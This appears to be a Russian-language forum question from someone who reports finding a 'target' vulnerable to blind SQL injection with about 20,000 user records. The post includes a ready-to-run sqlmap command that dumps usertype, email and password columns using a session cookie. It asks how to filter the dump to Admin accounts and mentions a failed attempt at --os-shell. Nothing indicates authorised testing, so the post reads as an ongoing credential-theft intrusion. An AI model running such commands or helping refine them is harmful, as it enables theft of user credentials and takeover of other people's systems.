Я нашел цель, которая работает с sqlmap, и есть 20k данных
+-------------+----------------+--------------+
| usertype | email | password |
+-------------+----------------+--------------+
| User | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| User | example@ex.com | 12345678 |
| ... | | |
+-------------+----------------+--------------+
IAM с использованием типа инъекции boolean-based blind - WHERE or HAVING clause
, теперь как я могу сбросить данные, которые только User Type
является Admin?
моя команда
python sqlmap.py -u https://example.com --data "inject=0&data=1*" --cookie="user_session=example" -D user_data -T table_user -C usertype,email,password --dump --level 2 --risk 2
, если используется команда sql, которая должна использовать оператор WHERE
, но она не работает с использованием --os-shell